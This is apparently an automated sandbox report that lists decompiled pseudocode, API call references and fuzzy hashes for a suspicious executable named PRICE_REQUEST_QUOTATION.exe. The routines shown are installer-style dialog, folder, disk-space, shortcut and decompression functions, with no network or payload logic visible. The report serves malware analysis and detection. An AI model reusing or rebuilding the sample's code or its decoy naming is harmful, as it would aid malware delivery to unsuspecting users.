                                        							}
                                        							_t231 = _v20;
                                        							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
                                        							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
                                        								goto L55;
                                        							}
                                        							goto L54;
                                        						}
                                        						goto L28;
                                        					}
                                        				} else {
                                        					 *0x42ec80 = _a4;
                                        					_t247 =  *0x42ec4c; // 0x4
                                        					_t285 = 2;
                                        					_v28 = 0;
                                        					_v16 = _t285;
                                        					 *0x42a094 = GlobalAlloc(0x40, _t247 << 2);
                                        					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
                                        					 *0x42a088 =  *0x42a088 | 0xffffffff;
                                        					_v24 = _t250;
                                        					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
                                        					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                        					 *0x42a07c = _t252;
                                        					ImageList_AddMasked(_t252, _v24, 0xff00ff);
                                        					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
                                        					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
                                        						SendMessageA(_v8, 0x111b, 0x10, 0);
                                        					}
                                        					DeleteObject(_v24);
                                        					_t286 = 0;
                                        					do {
                                        						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
                                        						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
                                        							if(_t286 != 0x20) {
                                        								_v16 = _t315;
                                        							}
                                        							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
                                        						}
                                        						_t286 = _t286 + 1;
                                        					} while (_t286 < 0x21);
                                        					_t317 = _a16;
                                        					_t287 = _v16;
                                        					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
                                        					_push(0x15);
                                        					E00403E83(_a4);
                                        					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
                                        					_push(0x16);
                                        					E00403E83(_a4);
                                        					_t318 = 0;
                                        					_t288 = 0;
                                        					_t328 =  *0x42ec4c - _t318; // 0x4
                                        					if(_t328 <= 0) {
                                        						L19:
                                        						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
                                        						goto L20;
                                        					} else {
                                        						_t311 = _v32 + 8;
                                        						_v24 = _t311;
                                        						do {
                                        							_t268 = _t311 + 0x10;
                                        							if( *_t268 != 0) {
                                        								_v60 = _t268;
                                        								_t269 =  *_t311;
                                        								_t302 = 0x20;
                                        								_v84 = _t288;
                                        								_v80 = 0xffff0002;
                                        								_v76 = 0xd;
                                        								_v64 = _t302;
                                        								_v40 = _t318;
                                        								_v68 = _t269 & _t302;
                                        								if((_t269 & 0x00000002) == 0) {
                                        									__eflags = _t269 & 0x00000004;
                                        									if((_t269 & 0x00000004) == 0) {
                                        										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                        									} else {
                                        										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
                                        									}
                                        								} else {
                                        									_v76 = 0x4d;
                                        									_v44 = 1;
                                        									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
                                        									_v28 = 1;
                                        									 *( *0x42a094 + _t318 * 4) = _t274;
                                        									_t288 =  *( *0x42a094 + _t318 * 4);
                                        								}
                                        							}
                                        							_t318 = _t318 + 1;
                                        							_t311 = _v24 + 0x418;
                                        							_t331 = _t318 -  *0x42ec4c; // 0x4
                                        							_v24 = _t311;
                                        						} while (_t331 < 0);
                                        						if(_v28 != 0) {
                                        							L20:
                                        							if(_v16 != 0) {
                                        								E00403EB8(_v8);
                                        								_t280 = _v32;
                                        								_t315 = 0;
                                        								__eflags = 0;
                                        								goto L23;
                                        							} else {
                                        								ShowWindow(_v12, 5);
                                        								E00403EB8(_v12);
                                        								L89:
                                        								return E00403EEA(_a8, _a12, _a16);
                                        							}
                                        						}
                                        						goto L19;
                                        					}
                                        				}
                                        			}






































































                                        0x00404d6c
                                        0x00404d6c
                                        0x00404d6e
                                        0x00404d71
                                        0x00404d7a
                                        0x00404d7a
                                        0x00000000
                                        0x00404ced
                                        0x00404c81
                                        0x00404c8c
                                        0x00404c8f
                                        0x00404c94
                                        0x00404c96
                                        0x00404c98
                                        0x00404c9a
                                        0x00404caa
                                        0x00404cb4
                                        0x00404cb6
                                        0x00404cb9
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404c9c
                                        0x00404c9c
                                        0x00404c9c
                                        0x00404c9f
                                        0x00404ca2
                                        0x00404ca4
                                        0x00404ca4
                                        0x00404ca4
                                        0x00404ca5
                                        0x00404ca6
                                        0x00404ca6
                                        0x00000000
                                        0x00404c9c
                                        0x00404c7f
                                        0x00404c63
                                        0x00404b9a
                                        0x00404ba0
                                        0x00000000
                                        0x00000000
                                        0x00404bac
                                        0x00404bb0
                                        0x00000000
                                        0x00000000
                                        0x00404bc0
                                        0x00404bc2
                                        0x00404bc5
                                        0x00000000
                                        0x00000000
                                        0x00404bd7
                                        0x00404bd9
                                        0x00404bdc
                                        0x00404be6
                                        0x00404be8
                                        0x00404be9
                                        0x00404bea
                                        0x00404bf9
                                        0x00404bfb
                                        0x00404c02
                                        0x00404c05
                                        0x00000000
                                        0x00404c05
                                        0x00404bde
                                        0x00404be1
                                        0x00404be4
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00404be4
                                        0x00000000
                                        0x00404aa4
                                        0x00404856
                                        0x0040485b
                                        0x00404860
                                        0x00404865
                                        0x00404866
                                        0x0040486f
                                        0x0040487a
                                        0x00404885
                                        0x0040488b
                                        0x00404899
                                        0x004048ae
                                        0x004048b3
                                        0x004048be
                                        0x004048c7
                                        0x004048dc
                                        0x004048ed
                                        0x004048fa
                                        0x004048fa
                                        0x004048ff
                                        0x00404905
                                        0x00404907
                                        0x0040490a
                                        0x0040490f
                                        0x00404914
                                        0x00404916
                                        0x00404916
                                        0x00404936
                                        0x00404936
                                        0x00404938
                                        0x00404939
                                        0x0040493e
                                        0x00404941
                                        0x00404944
                                        0x00404948
                                        0x0040494d
                                        0x00404952
                                        0x00404956
                                        0x0040495b
                                        0x00404960
                                        0x00404962
                                        0x00404964
                                        0x0040496a
                                        0x00404a34
                                        0x00404a47
                                        0x00000000
                                        0x00404970
                                        0x00404973
                                        0x00404976
                                        0x00404979
                                        0x00404979
                                        0x0040497f
                                        0x00404985
                                        0x00404988
                                        0x0040498e
                                        0x0040498f
                                        0x00404994
                                        0x0040499d
                                        0x004049a4
                                        0x004049a7
                                        0x004049aa
                                        0x004049ad
                                        0x004049e7
                                        0x004049e9
                                        0x00404a12
                                        0x004049eb
                                        0x004049f8
                                        0x004049f8
                                        0x004049af
                                        0x004049b2
                                        0x004049c1
                                        0x004049cb
                                        0x004049d3
                                        0x004049da
                                        0x004049e2
                                        0x004049e2
                                        0x004049ad
                                        0x00404a18
                                        0x00404a19
                                        0x00404a1f
                                        0x00404a25
                                        0x00404a25
                                        0x00404a32
                                        0x00404a4d
                                        0x00404a51
                                        0x00404a6e
                                        0x00404a73
                                        0x00404a76
                                        0x00404a76
                                        0x00000000
                                        0x00404a53
                                        0x00404a58
                                        0x00404a61
                                        0x00404dee
                                        0x00404e00
                                        0x00404e00
                                        0x00404a51
                                        0x00000000
                                        0x00404a32
                                        0x0040496a

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                        • String ID: $M$N
                                        • API String ID: 1638840714-813528018
                                        • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                        • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
                                        • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
                                        • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 78%
                                        			E004042C1(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                        				signed int _v8;
                                        				signed int _v12;
                                        				long _v16;
                                        				long _v20;
                                        				long _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				long _v36;
                                        				char _v40;
                                        				unsigned int _v44;
                                        				signed int _v48;
                                        				CHAR* _v56;
                                        				intOrPtr _v60;
                                        				intOrPtr _v64;
                                        				intOrPtr _v68;
                                        				CHAR* _v72;
                                        				void _v76;
                                        				struct HWND__* _v80;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				intOrPtr _t82;
                                        				long _t87;
                                        				signed char* _t89;
                                        				void* _t95;
                                        				signed int _t96;
                                        				int _t109;
                                        				signed short _t114;
                                        				signed int _t118;
                                        				struct HWND__** _t122;
                                        				intOrPtr _t124;
                                        				intOrPtr* _t138;
                                        				CHAR* _t146;
                                        				intOrPtr _t147;
                                        				unsigned int _t150;
                                        				signed int _t152;
                                        				unsigned int _t156;
                                        				signed int _t158;
                                        				signed int* _t159;
                                        				struct HWND__* _t165;
                                        				struct HWND__* _t166;
                                        				int _t168;
                                        				unsigned int _t197;
                                        
                                        				_t156 = __edx;
                                        				_t82 =  *0x429870;
                                        				_v32 = _t82;
                                        				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x42f000;
                                        				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                        				if(_a8 == 0x40b) {
                                        					E0040546C(0x3fb, _t146);
                                        					E00405E29(_t146);
                                        				}
                                        				_t166 = _a4;
                                        				if(_a8 != 0x110) {
                                        					L8:
                                        					if(_a8 != 0x111) {
                                        						L20:
                                        						if(_a8 == 0x40f) {
                                        							L22:
                                        							_v8 = _v8 & 0x00000000;
                                        							_v12 = _v12 & 0x00000000;
                                        							E0040546C(0x3fb, _t146);
                                        							if(E0040579B(_t185, _t146) == 0) {
                                        								_v8 = 1;
                                        							}
                                        							E00405BC7(0x429068, _t146);
                                        							_t87 = E00405F57(1);
                                        							_v16 = _t87;
                                        							if(_t87 == 0) {
                                        								L30:
                                        								E00405BC7(0x429068, _t146);
                                        								_t89 = E0040574E(0x429068);
                                        								_t158 = 0;
                                        								if(_t89 != 0) {
                                        									 *_t89 =  *_t89 & 0x00000000;
                                        								}
                                        								if(GetDiskFreeSpaceA(0x429068,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                        									goto L35;
                                        								} else {
                                        									_t168 = 0x400;
                                        									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                        									asm("cdq");
                                        									_v48 = _t109;
                                        									_v44 = _t156;
                                        									_v12 = 1;
                                        									goto L36;
                                        								}
                                        							} else {
                                        								_t159 = 0;
                                        								if(0 == 0x429068) {
                                        									goto L30;
                                        								} else {
                                        									goto L26;
                                        								}
                                        								while(1) {
                                        									L26:
                                        									_t114 = _v16(0x429068,  &_v48,  &_v28,  &_v40);
                                        									if(_t114 != 0) {
                                        										break;
                                        									}
                                        									if(_t159 != 0) {
                                        										 *_t159 =  *_t159 & _t114;
                                        									}
                                        									_t159 = E00405701(0x429068) - 1;
                                        									 *_t159 = 0x5c;
                                        									if(_t159 != 0x429068) {
                                        										continue;
                                        									} else {
                                        										goto L30;
                                        									}
                                        								}
                                        								_t150 = _v44;
                                        								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                        								_v44 = _t150 >> 0xa;
                                        								_v12 = 1;
                                        								_t158 = 0;
                                        								__eflags = 0;
                                        								L35:
                                        								_t168 = 0x400;
                                        								L36:
                                        								_t95 = E00404755(5);
                                        								if(_v12 != _t158) {
                                        									_t197 = _v44;
                                        									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                        										_v8 = 2;
                                        									}
                                        								}
                                        								_t147 =  *0x42e3fc; // 0x6c6eb3
                                        								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                        									E0040473D(0x3ff, 0xfffffffb, _t95);
                                        									if(_v12 == _t158) {
                                        										SetDlgItemTextA(_a4, _t168, 0x429058);
                                        									} else {
                                        										E00404678(_t168, 0xfffffffc, _v48, _v44);
                                        									}
                                        								}
                                        								_t96 = _v8;
                                        								 *0x42ecc4 = _t96;
                                        								if(_t96 == _t158) {
                                        									_v8 = E0040140B(7);
                                        								}
                                        								if(( *(_v32 + 0x14) & _t168) != 0) {
                                        									_v8 = _t158;
                                        								}
                                        								E00403EA5(0 | _v8 == _t158);
                                        								if(_v8 == _t158 &&  *0x42a08c == _t158) {
                                        									E00404256();
                                        								}
                                        								 *0x42a08c = _t158;
                                        								goto L53;
                                        							}
                                        						}
                                        						_t185 = _a8 - 0x405;
                                        						if(_a8 != 0x405) {
                                        							goto L53;
                                        						}
                                        						goto L22;
                                        					}
                                        					_t118 = _a12 & 0x0000ffff;
                                        					if(_t118 != 0x3fb) {
                                        						L12:
                                        						if(_t118 == 0x3e9) {
                                        							_t152 = 7;
                                        							memset( &_v76, 0, _t152 << 2);
                                        							_v80 = _t166;
                                        							_v72 = 0x42a0a0;
                                        							_v60 = E00404612;
                                        							_v56 = _t146;
                                        							_v68 = E00405BE9(_t146, 0x42a0a0, _t166, 0x429470, _v12);
                                        							_t122 =  &_v80;
                                        							_v64 = 0x41;
                                        							__imp__SHBrowseForFolderA(_t122);
                                        							if(_t122 == 0) {
                                        								_a8 = 0x40f;
                                        							} else {
                                        								__imp__CoTaskMemFree(_t122);
                                        								E004056BA(_t146);
                                        								_t124 =  *0x42ec30; // 0x6c0230
                                        								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
                                        								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t146 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
                                        									E00405BE9(_t146, 0x42a0a0, _t166, 0, _t125);
                                        									if(lstrcmpiA(0x42dbc0, 0x42a0a0) != 0) {
                                        										lstrcatA(_t146, 0x42dbc0);
                                        									}
                                        								}
                                        								 *0x42a08c =  *0x42a08c + 1;
                                        								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                        							}
                                        						}
                                        						goto L20;
                                        					}
                                        					if(_a12 >> 0x10 != 0x300) {
                                        						goto L53;
                                        					}
                                        					_a8 = 0x40f;
                                        					goto L12;
                                        				} else {
                                        					_t165 = GetDlgItem(_t166, 0x3fb);
                                        					if(E00405727(_t146) != 0 && E0040574E(_t146) == 0) {
                                        						E004056BA(_t146);
                                        					}
                                        					 *0x42e3f8 = _t166;
                                        					SetWindowTextA(_t165, _t146);
                                        					_push( *((intOrPtr*)(_a16 + 0x34)));
                                        					_push(1);
                                        					E00403E83(_t166);
                                        					_push( *((intOrPtr*)(_a16 + 0x30)));
                                        					_push(0x14);
                                        					E00403E83(_t166);
                                        					E00403EB8(_t165);
                                        					_t138 = E00405F57(0xa);
                                        					if(_t138 == 0) {
                                        						L53:
                                        						return E00403EEA(_a8, _a12, _a16);
                                        					} else {
                                        						 *_t138(_t165, 1);
                                        						goto L8;
                                        					}
                                        				}
                                        			}
                                        0x004043fd
                                        0x00404402
                                        0x00404407
                                        0x0040440f
                                        0x0040441c
                                        0x00404430
                                        0x00404434
                                        0x00404434
                                        0x00404430
                                        0x00404439
                                        0x00404446
                                        0x00404446
                                        0x004043f3
                                        0x00000000
                                        0x004043ab
                                        0x00404399
                                        0x00000000
                                        0x00000000
                                        0x0040439f
                                        0x00000000
                                        0x0040430a
                                        0x00404317
                                        0x00404320
                                        0x0040432d
                                        0x0040432d
                                        0x00404334
                                        0x0040433a
                                        0x00404343
                                        0x00404346
                                        0x00404349
                                        0x00404351
                                        0x00404354
                                        0x00404357
                                        0x0040435d
                                        0x00404364
                                        0x0040436b
                                        0x004045fd
                                        0x0040460f
                                        0x00404371
                                        0x00404374
                                        0x00000000
                                        0x00404374
                                        0x0040436b

                                        APIs
                                        • GetDlgItem.USER32 ref: 00404310
                                        • SetWindowTextA.USER32(00000000,?), ref: 0040433A
                                        • SHBrowseForFolderA.SHELL32(?,00429470,?), ref: 004043EB
                                        • CoTaskMemFree.OLE32(00000000), ref: 004043F6
                                        • lstrcmpiA.KERNEL32(TclpOwkq,0042A0A0,00000000,?,?), ref: 00404428
                                        • lstrcatA.KERNEL32(?,TclpOwkq), ref: 00404434
                                        • SetDlgItemTextA.USER32 ref: 00404446
                                          • Part of subcall function 0040546C: GetDlgItemTextA.USER32 ref: 0040547F
                                          • Part of subcall function 00405E29: CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E81
                                          • Part of subcall function 00405E29: CharNextA.USER32(?,?,?,00000000), ref: 00405E8E
                                          • Part of subcall function 00405E29: CharNextA.USER32(?,"C:\Users\user\Desktop\PRICE_REQUEST_QUOTATION.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405E93
                                          • Part of subcall function 00405E29: CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403105,C:\Users\user\AppData\Local\Temp\,?,004032B8), ref: 00405EA3
                                        • GetDiskFreeSpaceA.KERNEL32(00429068,?,?,0000040F,?,00429068,00429068,?,00000001,00429068,?,?,000003FB,?), ref: 00404504
                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 0040451F
                                          • Part of subcall function 00404678: lstrlenA.KERNEL32(0042A0A0,0042A0A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404593,000000DF,00000000,00000400,?), ref: 00404716
                                          • Part of subcall function 00404678: wsprintfA.USER32 ref: 0040471E
                                          • Part of subcall function 00404678: SetDlgItemTextA.USER32 ref: 00404731
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                        • String ID: A$C:\Users\user\AppData\Local\Temp$TclpOwkq
                                        • API String ID: 2624150263-3768769761
                                        • Opcode ID: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                        • Instruction ID: 171edb992a826102812884c43759f415235567a44aa7ca021352bae990107689
                                        • Opcode Fuzzy Hash: 3f80b46dd096fd368bede20d2bfb79225146288fd6115dbd0f947cd12367bd25
                                        • Instruction Fuzzy Hash: 6CA16FB1900208ABDB11AFA5DC41BAF77B8EF84315F14803BF615B62D1D77C9A418F69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 74%
                                        			E00402053() {
                                        				void* _t44;
                                        				intOrPtr* _t48;
                                        				intOrPtr* _t50;
                                        				intOrPtr* _t52;
                                        				intOrPtr* _t54;
                                        				signed int _t58;
                                        				intOrPtr* _t59;
                                        				intOrPtr* _t62;
                                        				intOrPtr* _t64;
                                        				intOrPtr* _t66;
                                        				intOrPtr* _t69;
                                        				intOrPtr* _t71;
                                        				int _t75;
                                        				signed int _t81;
                                        				intOrPtr* _t88;
                                        				void* _t95;
                                        				void* _t96;
                                        				void* _t100;
                                        
                                        				 *(_t100 - 0x30) = E00402A29(0xfffffff0);
                                        				_t96 = E00402A29(0xffffffdf);
                                        				 *((intOrPtr*)(_t100 - 0x34)) = E00402A29(2);
                                        				 *((intOrPtr*)(_t100 - 0xc)) = E00402A29(0xffffffcd);
                                        				 *((intOrPtr*)(_t100 - 0x38)) = E00402A29(0x45);
                                        				if(E00405727(_t96) == 0) {
                                        					E00402A29(0x21);
                                        				}
                                        				_t44 = _t100 + 8;
                                        				__imp__CoCreateInstance(0x407504, _t75, 1, 0x4074f4, _t44);
                                        				if(_t44 < _t75) {
                                        					L13:
                                        					 *((intOrPtr*)(_t100 - 4)) = 1;
                                        					_push(0xfffffff0);
                                        				} else {
                                        					_t48 =  *((intOrPtr*)(_t100 + 8));
                                        					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x407514, _t100 - 8);
                                        					if(_t95 >= _t75) {
                                        						_t52 =  *((intOrPtr*)(_t100 + 8));
                                        						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
                                        						_t54 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\alfons\\AppData\\Local\\Temp");
                                        						_t81 =  *(_t100 - 0x18);
                                        						_t58 = _t81 >> 0x00000008 & 0x000000ff;
                                        						if(_t58 != 0) {
                                        							_t88 =  *((intOrPtr*)(_t100 + 8));
                                        							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
                                        							_t81 =  *(_t100 - 0x18);
                                        						}
                                        						_t59 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
                                        						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 0xc)))) != _t75) {
                                        							_t71 =  *((intOrPtr*)(_t100 + 8));
                                        							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 0xc)),  *(_t100 - 0x18) & 0x000000ff);
                                        						}
                                        						_t62 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x34)));
                                        						_t64 =  *((intOrPtr*)(_t100 + 8));
                                        						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x38)));
                                        						if(_t95 >= _t75) {
                                        							_t95 = 0x80004005;
                                        							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409438, 0x400) != 0) {
                                        								_t69 =  *((intOrPtr*)(_t100 - 8));
                                        								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409438, 1);
                                        							}
                                        						}
                                        						_t66 =  *((intOrPtr*)(_t100 - 8));
                                        						 *((intOrPtr*)( *_t66 + 8))(_t66);
                                        					}
                                        					_t50 =  *((intOrPtr*)(_t100 + 8));
                                        					 *((intOrPtr*)( *_t50 + 8))(_t50);
                                        					if(_t95 >= _t75) {
                                        						_push(0xfffffff4);
                                        					} else {
                                        						goto L13;
                                        					}
                                        				}
                                        				E00401423();
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t100 - 4));
                                        				return 0;
                                        			}

                                        APIs
                                        • CoCreateInstance.OLE32(00407504,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020A6
                                        • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409438,00000400,?,00000001,004074F4,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402160
                                        Strings
                                        • C:\Users\user\AppData\Local\Temp, xrefs: 004020DE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID: C:\Users\user\AppData\Local\Temp
                                        • API String ID: 123533781-1943935188
                                        • Opcode ID: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                        • Instruction ID: 8f67ba42191d57eba63015a6e8d0bffc44353c0eb35145c2afa1481ff4163fd5
                                        • Opcode Fuzzy Hash: 0f4e10af4ab318a31e6fcfc6a713dc1191477b15d05add315443f5ab89249dcc
                                        • Instruction Fuzzy Hash: 2D414C75A00205BFCB00DFA8CD89E9E7BB6EF49354F204169FA05EB2D1CA799C41CB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 39%
                                        			E00402671(char __ebx, char* __edi, char* __esi) {
                                        				void* _t19;
                                        
                                        				if(FindFirstFileA(E00402A29(2), _t19 - 0x19c) != 0xffffffff) {
                                        					E00405B25(__edi, _t6);
                                        					_push(_t19 - 0x170);
                                        					_push(__esi);
                                        					E00405BC7();
                                        				} else {
                                        					 *__edi = __ebx;
                                        					 *__esi = __ebx;
                                        					 *((intOrPtr*)(_t19 - 4)) = 1;
                                        				}
                                        				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t19 - 4));
                                        				return 0;
                                        			}

                                        APIs
                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402680
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.273075902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.273067126.0000000000400000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273096672.0000000000407000.00000002.00020000.sdmp
                                        • Associated: 00000000.00000002.273109569.0000000000409000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273162042.000000000042C000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273182890.0000000000434000.00000004.00020000.sdmp
                                        • Associated: 00000000.00000002.273191883.0000000000437000.00000002.00020000.sdmp
                                        Similarity
                                        • API ID: FileFindFirst
                                        • String ID:
                                        • API String ID: 1974802433-0
                                        • Opcode ID: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                        • Instruction ID: d100cd6159f555773fbda265320c1ac67d2490096a0530dc8ee4140695772295
                                        • Opcode Fuzzy Hash: 210d19403dc9ad4312224203accd8d1f3ff27f6c6522c4c2c719f15252d079a4
                                        • Instruction Fuzzy Hash: 24F0A0326081049ED711EBA99A499EEB778DB11328F6045BFE101B61C1C7B859459A3A
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 79%
                                        			E00406354(signed int __ebx, signed int* __esi) {
                                        				signed int _t396;
                                        				signed int _t425;
                                        				signed int _t442;
                                        				signed int _t443;
                                        				signed int* _t446;
                                        				void* _t448;
                                        
                                        				L0:
                                        				while(1) {
                                        					L0:
                                        					_t446 = __esi;
                                        					_t425 = __ebx;
                                        					if( *(_t448 - 0x34) == 0) {
                                        						break;
                                        					}
                                        					L55:
                                        					__eax =  *(__ebp - 0x38);
                                        					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                        					__ecx = __ebx;
                                        					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                        					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                        					__ebx = __ebx + 8;
                                        					while(1) {
                                        						L56:
                                        						if(__ebx < 0xe) {
                                        							goto L0;
                                        						}
                                        						L57:
                                        						__eax =  *(__ebp - 0x40);
                                        						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                        						__ecx = __eax;
                                        						__esi[1] = __eax;
                                        						__ecx = __eax & 0x0000001f;
                                        						if(__cl > 0x1d) {
                                        							L9:
                                        							_t443 = _t442 | 0xffffffff;
                                        							 *_t446 = 0x11;
                                        							L10:
                                        							_t446[0x147] =  *(_t448 - 0x40);
                                        							_t446[0x146] = _t425;
                                        							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                        							L11:
                                        							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                        							_t446[0x26ea] =  *(_t448 - 0x30);
                                        							E00406AC3( *(_t448 + 8));
                                        							return _t443;
                                        						}
                                        						L58:
                                        						__eax = __eax & 0x000003e0;
                                        						if(__eax > 0x3a0) {
                                        							goto L9;
                                        						}
                                        						L59:
                                        						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                        						__ebx = __ebx - 0xe;
                                        						_t94 =  &(__esi[2]);
